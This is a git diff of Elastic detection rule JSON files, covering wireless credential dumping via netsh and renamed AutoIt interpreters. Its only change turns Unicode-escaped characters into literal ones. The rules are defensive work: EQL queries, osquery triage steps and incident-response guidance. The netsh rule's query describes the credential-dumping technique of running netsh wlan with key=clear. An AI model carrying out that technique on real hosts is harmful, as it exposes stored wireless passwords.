Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n", "references": [ "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json index 85919573dad..684239d78c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json +++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Wireless Credential Dumping using Netsh Command", - "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n", "references": [ "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json index 9264b10aa1e..73ba80cc274 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json index 8e15b4ec374..c1845c167af 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json index db7ce9023e2..cb2e5a5c9ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - 